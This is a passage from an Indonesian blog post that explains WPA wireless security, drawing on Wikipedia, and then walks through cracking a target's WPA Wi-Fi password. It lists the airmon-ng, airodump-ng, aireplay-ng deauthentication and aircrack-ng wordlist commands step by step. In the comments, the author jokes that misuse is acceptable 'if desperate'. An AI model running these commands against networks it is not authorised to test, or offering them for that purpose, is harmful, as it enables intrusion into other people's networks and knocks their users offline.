melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP. Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i. Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC).
Fungsi dari komputer pribadi ini kemudian dikenal dengan istilah authentication server, yang memberikan key yang berbeda kepada masing–masing pengguna/client dari suatu jaringan nirkabel yang menggunakan akses point sebagai media sentral komunikasi. Seperti dengan jaringan WEP, metoda enkripsi dari WPA ini juga menggunakan algoritma RC4.
Pengamanan jaringan nirkabel dengan metoda WPA ini, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA ini. Ketiga menu yang harus diisi tersebut adalah:
- Server
- Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.
- Port
- Nomor port yang digunakan adalah 1812.
- Shared Secret
- Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.
Setelah komputer diinstall perangkat lunak otontikasi seperti freeRADIUS, maka sertifikat yang dari server akan dibagikan kepada client.
Untuk menggunakan Radius server bisa juga dengan tanpa menginstall perangkat lunak di sisi komputer client. Cara yang di gunakan adalah Web Authentication dimana User akan diarahkan ke halaman Login terlebih dahulu sebelum bisa menggunakan Jaringan Wireless. Dan Server yang menangani autentikasi adalah Radius server.
Ok mungkin cukup jelas penjelasan yang saya copy paste dari wikipedia diatas tentang WPA,dimana jaringan nirkabel atau wireles yang diproteksi oleh key ini agak lebih aman daripada WEP,akan tetapi dalam suatu system jaringan tidak ada yang 100% aman dan masih banyak celah yang dapat dimanfaatkan oleh para attacker.ok dalam praktek ini,mari kita buktikan seberapa amankah security WPA ini.
Dalam kasus ini para attacker memerlukan beberapa alat perang yang wajib ada diantaranya
PC/Laptop
Wireles/Usb Wirles + Antena Outdor (untuk jarak jauh)
Oh ya Perlu diketahui untuk mengcrack password wifi WPA key ini memerlukan Wordlist,dimana wordlist ini nantinya akan disamakan dengan hasil snifing accses point target dengan backtrack5 apabila ada yang sama maka proses cracking pasti berhasil akan tetapi apabila dalam wordlist tidak ada pasword yang cocok atau yang sama dengan password accses point target maka proses cracking tidak akan berhasil
Dalam percobaan kali ini,saya menggunakan OS Backtrack 5 R1 pada mesin Vmware workstation.di windows7 dan satu buah wireles USB yang suport untuk linux dalam kasus ini saya menggunakan wirless USB TP-Link TL-WN722N
Buat temen temen yang belum tau apa itu Vmware sebaiknya baca terlebih dahulu artikel saya sebelumnya tentang Instal Backtrack 5 R1 On Vmware Untuk memulai proses cracking,tentunya dibutuhkan pengetahuan dasar dan consule consule yang telah ditentukan dalam praktek ini kita menggunakan beberapa consule diantaranya airmon-ng,airodump-ng,danjuga aircrack-ng Baik kita mulai saja,langkah pertama runing OS backtrack5 di vmware,jika sudah masuk pada tampilan desktop kemudian buka terminal dan ketikan
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w filehasilsniffing mon0
keterangan XX:XX:XX:XX:XX masukan bssid accsess point target
aireplay-ng -0 0 -a XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX mon0
keterangan -0 0 code deauth
-a XX:XX:XX:XX:XX bssid client target
-c XX:XX:XX:XX:XX bssid Acsess Point
(sampai diatasnya keluar WPA handshake)
ls
(cari file filehasilsniffing.cap)
aircrack-ng -w worldlist filehasilsnif.cap
tunggu proses cracking ,apabila berhasil maka akan ada keterangan key found
Ok langsung saja perhatikan video praktek yang saya buat di bawah ini
Source : Wikipedia
6 komentar:
good gan
Posting ini telah dihapus oleh administrator blog.
@kholidil amin hoho sama sama sob jangan kapok yah mampir ke blog saya
ilmu yang mantafffff.....!!!,thanxz brther...
@anonim hoho siap2 jangan disalah gunakan yah bro,kalo kepepet mah sih gak apaapa hihihi
mantap gan....
Posting Komentar